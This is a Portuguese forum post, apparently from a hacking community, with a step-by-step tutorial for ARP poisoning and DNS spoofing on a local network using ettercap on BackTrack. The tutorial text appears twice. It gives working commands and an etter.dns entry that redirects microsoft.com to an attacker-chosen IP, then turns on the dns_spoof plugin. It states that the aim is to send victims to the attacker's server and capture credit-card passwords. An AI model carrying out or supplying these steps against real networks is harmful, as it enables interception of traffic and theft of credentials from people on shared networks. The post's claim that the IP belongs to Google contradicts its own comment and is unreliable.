[Arp Poisoning + Dns Spoof]
Página 1 de 1
[Arp Poisoning + Dns Spoof]
- Boa noite, vamos a uma pequena instrodução antes de começar a pratica do ARP POISONING + DNS SPOOF .
O que é DNS spoofing ?
DNS spoofing é um ataque onde o hacker compromete um servidor de nomes (Domain Name System).
O servidor aceita e usa incorretamente a informação de um host que não tem autoridade de dar esta informação.
Utilizando esta técnica, o atacante pode direcionar o email ou navegador da vítima para o seu próprio servidor. Com isso ele pode, por exemplo, capturar senhas de cartões de crédito em sites de comprar.
Para executar esse tipo de ataque é necessário que o ARP-Poisoning seja realizado inicialmente.
A técnica de ARP-Poisoning é aplicada apenas em redes Ethernet. Basicamente, um sistema conectado a um IP ou LAN Ethernet tem dois endereços. O primeiro endereço é o MAC, que é atribuído à placa de rede (NIC[1]) possuída pelo usuário. Os endereços MAC são (ou supõe-se ser) únicos e utilizando esse endereço o protocolo Ethernet envia os dados. O protocolo Ethernet constrói frames de dados que consistem de blocos de 1500 bytes. Um frame Ethernet consiste do cabeçalho Ethernet, contendo o endereço MAC do computador origem e do computador destino.
O segundo endereço é o IP. O IP é um protocolo utilizado por aplicações, independente da tecnologia com que opera. Todo computador em uma rede deve possuir um endereço IP único para a comunicação. Os endereços IPs são virtuais e atribuídos pelo software.
IP e Ethernet devem trabalhar juntos. O IP comunica-se construindo pacotes que são diferentes da estrutura de frames. Esses pacotes são entregues pela camada de rede (Ethernet), que divide os pacotes em frames, adiciona um cabeçalho Ethernet e envia-os para um componente da rede. Este então decide a porta pela qual o frame deve ser enviado através da comparação do endereço destino do frame com uma tabela interna que mapeia os números das portas de um endereço MAC.
Como mencionado antes, um frame Ethernet é construído a partir de um pacote IP, mas para a construção de um frame Ethernet, a rede precisa do endereço MAC do computador destino. Aqui, a Ethernet sabe apenas o endereço IP da máquina destino.
Daí, para descobrir o endereço MAC do computador destino a partir de seu endereço IP, o protocolo ARP é utilizado.
Então tá Creditos ; Google (:
Vamos a pratica
Vamos ao terminal do Backtrack , e digitaremos
ettercap -Tq -M arp -o //
O sintax acima significa o envenenamento do cache DNS , da rede . Agora vamos procurar a pasta do ettercap geralmente encontrada na seguinte
root@bt:/usr/local/share/ettercap#
Vamos modificar o arquivos etter.dns , usaremos dentro da pasta ettercap a seguinte sintax
mcedit etter.dns , ira aparecer o editor de texto mcedit que funciona como um editor dentro da shell.
Como mostrará
Simplificando quando a vitima da rede digitar microsoft.com ela será redirecionada automaticamente ao 189.73.192.230 (GOOGLE) . Ta ok modificamos o etter.dns salva e vamos ao outros terminal que tinhamos executado a sinta ettercap -Tq -M arp -o// cancela essa operação dando um Ctrl+C . e na mesma shell execute
ettercap -Tq -M arp //
Aperte o 'H' , vai aparecer um menu , depois irá aparecer a seguinte informação
Inline help:
[vV] - change the visualization mode
[pP] - activate a plugin
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit
digite o p , ele ira te mostrar os plugins , e vai pedir pra você digitar o nome de um plugin .Digite dns_spoof
Ira começar a envenenar sua rede . Enquanto sua shell executando o dns_spoof o envenenamento não para relembrando , isso pode causar PROBLEMAS na sua rede .
Se tiver algo errado, pode complementar ai galera !
O que é DNS spoofing ?
DNS spoofing é um ataque onde o hacker compromete um servidor de nomes (Domain Name System).
O servidor aceita e usa incorretamente a informação de um host que não tem autoridade de dar esta informação.
Utilizando esta técnica, o atacante pode direcionar o email ou navegador da vítima para o seu próprio servidor. Com isso ele pode, por exemplo, capturar senhas de cartões de crédito em sites de comprar.
Para executar esse tipo de ataque é necessário que o ARP-Poisoning seja realizado inicialmente.
A técnica de ARP-Poisoning é aplicada apenas em redes Ethernet. Basicamente, um sistema conectado a um IP ou LAN Ethernet tem dois endereços. O primeiro endereço é o MAC, que é atribuído à placa de rede (NIC[1]) possuída pelo usuário. Os endereços MAC são (ou supõe-se ser) únicos e utilizando esse endereço o protocolo Ethernet envia os dados. O protocolo Ethernet constrói frames de dados que consistem de blocos de 1500 bytes. Um frame Ethernet consiste do cabeçalho Ethernet, contendo o endereço MAC do computador origem e do computador destino.
O segundo endereço é o IP. O IP é um protocolo utilizado por aplicações, independente da tecnologia com que opera. Todo computador em uma rede deve possuir um endereço IP único para a comunicação. Os endereços IPs são virtuais e atribuídos pelo software.
IP e Ethernet devem trabalhar juntos. O IP comunica-se construindo pacotes que são diferentes da estrutura de frames. Esses pacotes são entregues pela camada de rede (Ethernet), que divide os pacotes em frames, adiciona um cabeçalho Ethernet e envia-os para um componente da rede. Este então decide a porta pela qual o frame deve ser enviado através da comparação do endereço destino do frame com uma tabela interna que mapeia os números das portas de um endereço MAC.
Como mencionado antes, um frame Ethernet é construído a partir de um pacote IP, mas para a construção de um frame Ethernet, a rede precisa do endereço MAC do computador destino. Aqui, a Ethernet sabe apenas o endereço IP da máquina destino.
Daí, para descobrir o endereço MAC do computador destino a partir de seu endereço IP, o protocolo ARP é utilizado.
Então tá Creditos ; Google (:
Vamos a pratica
Vamos ao terminal do Backtrack , e digitaremos
ettercap -Tq -M arp -o //
O sintax acima significa o envenenamento do cache DNS , da rede . Agora vamos procurar a pasta do ettercap geralmente encontrada na seguinte
root@bt:/usr/local/share/ettercap#
Vamos modificar o arquivos etter.dns , usaremos dentro da pasta ettercap a seguinte sintax
mcedit etter.dns , ira aparecer o editor de texto mcedit que funciona como um editor dentro da shell.
Como mostrará
- Código:
#################################
# microsoft sucs ;)
# redirect it to www.linux.org
#
microsoft.com A 189.73.192.230
Simplificando quando a vitima da rede digitar microsoft.com ela será redirecionada automaticamente ao 189.73.192.230 (GOOGLE) . Ta ok modificamos o etter.dns salva e vamos ao outros terminal que tinhamos executado a sinta ettercap -Tq -M arp -o// cancela essa operação dando um Ctrl+C . e na mesma shell execute
ettercap -Tq -M arp //
Aperte o 'H' , vai aparecer um menu , depois irá aparecer a seguinte informação
Inline help:
[vV] - change the visualization mode
[pP] - activate a plugin
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit
digite o p , ele ira te mostrar os plugins , e vai pedir pra você digitar o nome de um plugin .Digite dns_spoof
Ira começar a envenenar sua rede . Enquanto sua shell executando o dns_spoof o envenenamento não para relembrando , isso pode causar PROBLEMAS na sua rede .
Se tiver algo errado, pode complementar ai galera !
Dr.Script- Membro
- Mensagens : 15
Pontos : 8578
Reputação : 10
Data de inscrição : 12/08/2012
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos